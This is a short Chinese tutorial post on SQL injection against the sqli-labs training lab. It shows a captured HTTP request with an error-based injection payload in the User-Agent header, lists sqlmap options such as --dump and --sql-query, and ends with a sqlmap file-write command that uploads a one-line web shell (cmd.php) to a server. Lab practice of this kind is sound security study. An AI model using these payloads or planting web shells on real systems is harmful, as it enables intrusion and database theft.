SQL注入-3

Posted abelte

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入-3相关的知识,希望对你有一定的参考价值。

在登录成功的情况下

将特殊字符 依次输入到下面的每一行后面 测试存在注入的位置

POST /sqli-labs-master/Less-18/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0‘+updatexml(1,concat(0x7e,database(),0x7e),1)+‘
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/sqli-labs-master/Less-18/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Connection: keep-alive
Upgrade-Insecure-Requests: 1

uname=admin&passwd=0&submit=Submit

 

sqlmap 参数

-u 指定测试的URL

-r  将抓到的包解析

-g 从谷歌上查询内容

-c 加载配置文件

--methon= post /get

--data=DATA 指定post参数

--cookie=COOKIE 指定cookie

--load-cookies= 从一个文件里load一个cookie

--user-agent= 指定user-agent

--random-agent 自动指定一个user-agent

--proxy= 指定代理

--threads= 指定线程数量

-p TestParameter 可测试的参数

--skip 跳过某个参数

--dbms=DBMS 指定数据库类型

--no-cast

--tamper= 指定一个py文件

-b 打印当前数据库的banner

--dump 脱库

--sql-query=query 执行一个sql语句

 

sqlmap结合burpsuite进行注入(post类型)

 以下两种方式

第一种 将抓到的包右键 save item 得到一个文件

/users/margin/desktop/sqli 是指 文件的路径以及文件本身

--flush-session 清空缓存

第二种

右键查看网页源代码 找到表单的input标签 找到name 进行以下的操作

技术分享图片

 

技术分享图片

 

一句话木马

sqlmap -u  --file-write=需要上传的文件的本地目录 --file-dest=目标服务器的目录(c:\\\\www\\sqli\\less-1\\cmd.php)

 













以上是关于SQL注入-3的主要内容,如果未能解决你的问题,请参考以下文章

SQL注入分类有哪些,一看你就明白了。SQL注入点/SQL注入类型/SQL注入有几种/SQL注入点分类

sql注入漏洞都有哪些

关于SQL注入

sql注入一

sql 注入是啥?

如何判断是不是存在SQL注入以及注入类型?